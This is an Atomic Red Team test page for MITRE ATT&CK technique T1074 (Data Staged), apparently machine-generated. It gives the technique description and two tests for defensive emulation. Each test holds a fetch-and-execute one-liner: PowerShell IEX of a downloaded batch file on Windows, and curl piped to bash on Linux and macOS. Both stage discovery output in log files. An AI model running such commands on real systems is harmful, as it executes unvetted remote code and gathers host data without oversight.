CircleCI Atomic Red Team doc generator
46 lines
1.5 KiB
Markdown
46 lines
1.5 KiB
Markdown
# T1074 - Data Staged
|
|
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1074)
|
|
<blockquote>Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022).
|
|
|
|
Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.</blockquote>
|
|
|
|
## Atomic Tests
|
|
|
|
- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
|
|
|
|
- [Atomic Test #2 - Stage data from Discovery.sh](#atomic-test-2---stage-data-from-discoverysh)
|
|
|
|
|
|
<br/>
|
|
|
|
## Atomic Test #1 - Stage data from Discovery.bat
|
|
Utilize powershell to download discovery.bat and save to a local file
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Run it with `powershell`!
|
|
```
|
|
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat') > pi.log
|
|
```
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #2 - Stage data from Discovery.sh
|
|
Utilize curl to download discovery.sh and execute a basic information gathering shell script
|
|
|
|
**Supported Platforms:** Linux, macOS
|
|
|
|
|
|
#### Run it with `bash`!
|
|
```
|
|
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
|
|
```
|
|
|
|
|
|
|
|
<br/>
|